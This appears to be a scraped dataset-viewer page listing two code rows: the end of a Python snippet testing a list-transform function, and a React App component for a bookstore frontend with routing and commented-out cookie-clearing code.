return transformed_nums
# Test the function
input_list = [1, 2, 3, 4, 5]
output_list = transform_list(input_list)
print(output_list) # Output: [4, 1, 10, 2, 16] |
<reponame>Subliminal-Panda/bookstore-frontend
import React, { useEffect } from 'react';
import { useRoutes } from 'hookrouter';
import NavBar from './navigation/navBar';
import routes from './navigation/routes';
export default function App() {
const routeResult = useRoutes(routes);
// const removeUserCookies = () => {
// window.onunload = () => {
// Cookies.remove('username');
// }
// };
// useEffect (() => {
// console.log(Cookies.get('username'));
// removeUserCookies();
// });
return (
<div className='app'>
<NavBar />
{routeResult}
</div>
);
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.